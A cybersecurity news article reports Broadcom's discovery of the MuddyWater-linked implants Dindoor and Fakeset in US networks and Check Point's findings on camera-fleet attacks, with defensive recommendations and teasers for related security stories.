MuddyWater Breaches US Networks; Broadcom Flags Dindoor and Fakeset
Operational Synopsis
Broadcom threat hunters detected a sustained espionage campaign whose artifacts Broadcom links to the Iran‑aligned cluster often labeled MuddyWater. In Broadcom telemetry analysts recovered two previously unpublicized implants — a native/PHP‑like payload referred to as Dindoor and a Python loader/stager called Fakeset — both observed using code‑signing certificates populated with fabricated personal names (one certificate lists a person rendered as Ms. Cherne). Forensic linkage shows confirmed exposures across four civilian and commercial environments: an airport, a bank, an NGO operating in two countries, and an aerospace/defense supplier with an overseas branch.
Broadcom teams removed live implants and disrupted active command channels, but their report — reinforced by independent vendor telemetry — warns that dormant credentials, lateral access paths and implanted artifacts likely persist across supply‑chain partners and third‑party estates. Timeline reconstruction indicates many footholds predate the recent kinetic escalation, suggesting deliberate long‑dwell positioning rather than a single opportunistic burst.
Complementary telemetry from Check Point describes a concentrated wave of probes and takeover attempts timed to late February through early March 2026 that targeted consumer- and enterprise-grade camera fleets and management-plane interfaces across Bahrain, Cyprus, Kuwait, Lebanon, Qatar and the UAE, with notable activity observed inside Israel. That vendor found attackers exploiting long‑known firmware and network‑service flaws (not novel zero‑days), staging mass validation and follow‑up observation using commodity VPNs and rented infrastructure — a pattern consistent with automated credential‑validation pipelines and rapid exploitation steps observed broadly across industry telemetry.
Across disclosures the technical picture converges on low‑noise persistence mechanisms (memory‑resident or transient stages), cloud‑hosted command‑and‑control and hybrid bridging techniques (removable‑media relays, innocuous cloud callbacks or abused edge appliances). Check Point’s camera findings underscore a significant, visible attack surface: many devices remain internet‑accessible and unpatched, enabling high‑volume enumeration that fuels automated pipelines. Combined with Broadcom’s certificate reuse observations, the operational tradecraft prioritizes stealthy long‑term access while compressing attacker time‑to‑exploit once credentials or management-plane access are validated.
Attribution across vendors is inconsistent — Broadcom maps artifacts into a MuddyWater cluster while Check Point ties camera activity to actors tracked as Handala — but these differences likely arise from overlapping toolchains, shared or recycled signing artefacts and convergent automation rather than indisputable proof of fully distinct operators. Practically, defenders should accept attribution ambiguity and prioritize containment, credential and certificate revocation, and exhaustive identity‑centric hunts over waiting for attribution consensus.
Immediate defensive priorities are accelerated token and credential revocation, expedited invalidation of discovered certificates, extended endpoint and identity hunts looking for anomalous scheduled tasks and memory‑resident stages, and urgent validation of third‑party and supplier estates. Specifically for camera and edge fleets: isolate management planes, rotate credentials, move vulnerable feeds behind VPNs/proxies where possible, and accelerate emergency patch cycles for firmware and network‑service bugs.
Longer‑term mitigations include hardware‑backed MFA, stricter browser and session governance, segmentation of management and operational planes (including SD‑WAN and edge appliances), controls on removable media and staged interpreters, and cross‑provider coordination to disrupt cloud‑hosted C2. Given the affected sectors — aviation, finance, NGOs and defense supply chains — organizations should also prepare for regulatory scrutiny, insurance impacts and cross‑border investigative cooperation.
In short, Broadcom’s disruption removed active processes and blocked immediate exfiltration, but the strategic risk endures: pre‑positioned implants, recycled signing artefacts and the broad abuse of cloud and edge infrastructure (amplified by automation and commodity infrastructure) create a durable collection capability that requires identity‑first, cross‑domain hunting and stricter supply‑chain trust validations.
Read Our Expert Analysis
Create an account or login for free to unlock our expert analysis and key takeaways for this development.
By continuing, you agree to receive marketing communications and our weekly newsletter. You can opt-out at any time.
Recommended for you
APT37 expands toolkit to pierce air gaps using removable media and cloud C2
Zscaler observed a December 2025 APT37 campaign that combined five newly identified modules — including a memory‑resident loader, a backdoored interpreter runtime, a USB relay spreader and an Android surveillance app — to pierce air‑gapped enclaves while using a mainstream cloud storage service for command-and-control. Defenders should couple stricter removable‑media controls with identity‑first telemetry and cross‑service signal fusion; platform takedowns help but do not eliminate the underlying tradecraft.
Cisco SD‑WAN Compromised; CISA and Five Eyes Order Emergency Hunts
CISA and Five Eyes partners warned of active exploitation against Cisco SD‑WAN, flagging two tracked CVEs and urging immediate hunts, log preservation, and patching. The alert joins a string of rapid, high‑impact exploit events (Fortinet, SolarWinds and other KEV additions), compressing remediation windows and forcing both near‑term incident response and longer‑term edge‑device inventory and replacement planning.
Investigations Find Ubiquiti Networking Equipment Accessible to Russian Forces and Used in Drone Operations
Independent reports allege Ubiquiti networking devices are being acquired through third-party channels and repurposed to support Russian military communications, including for unmanned aircraft. The revelations expose supply-chain and compliance gaps that could trigger regulatory scrutiny and force operational and product changes at the vendor level.
Operation Bizarre Bazaar: Criminal Network Hijacks Exposed LLM Endpoints for Profit and Access
A coordinated criminal campaign scans for unauthenticated LLM and model-control endpoints, then validates and monetizes access—running costly inference workloads, selling API access, and probing internal networks. Some exposed targets are agentic connectors and admin interfaces that can leak tokens, credentials, or execute commands, dramatically raising the stakes beyond billable inference.
Amazon: Hackers Used AI to Breach 600+ Firewalls in Weeks
Security teams at Amazon traced a compact, likely Russian‑speaking operation that used widely available AI tooling and automated agents to compromise more than 600 perimeter firewalls across roughly 55 countries in about five weeks. The campaign—which automated reconnaissance, credential validation and rapid probing—typifies a broader 2026 trend in which off‑the‑shelf AI compresses the time from discovery to exploitation, forcing defenders to treat exposed management interfaces and self‑hosted AI endpoints as high‑risk assets.
Global cyber-espionage campaign breaches sensitive targets in 37 countries
A coordinated, long-duration hacking campaign has established persistent access to high-value government and diplomatic networks in 37 countries, prioritizing intelligence collection over immediate disruption. The operation leverages polymorphic tooling, credential harvesting and social-engineering techniques that complicate detection and raise urgent needs for identity-focused defenses and cross-border incident coordination.
North Korea-linked hackers deploy AI deepfakes and new malware against crypto and fintech firms
Security researchers attribute a recent surge of tailored intrusions against cryptocurrency, fintech and venture firms to a North Korea-linked cluster that combined AI-generated deepfakes with social engineering to deliver seven distinct malware families. The campaign introduced multiple novel data-harvesting tools, leveraged automated reconnaissance and trusted collaboration channels, and highlights parallel risks from exposed AI endpoints and unvetted plugin ecosystems that amplify attacker scale.
U.S. security roundup: AI-enabled attacks rise, 277 water systems flagged, Disney hit with $2.75M fine
Adversaries are increasingly integrating generative models and automated agents into fast-moving attack chains while federal disclosures and vendor research expose concrete infrastructure and supply‑chain gaps—from 277 vulnerable water utilities to a configuration flaw affecting about 200 airports. Regulators and vendors responded with fines, guidance and new attribution frameworks, but rapid exploit timelines and legacy OT constraints mean systemic exposures will persist without accelerated patching, stronger identity controls and tighter vendor oversight.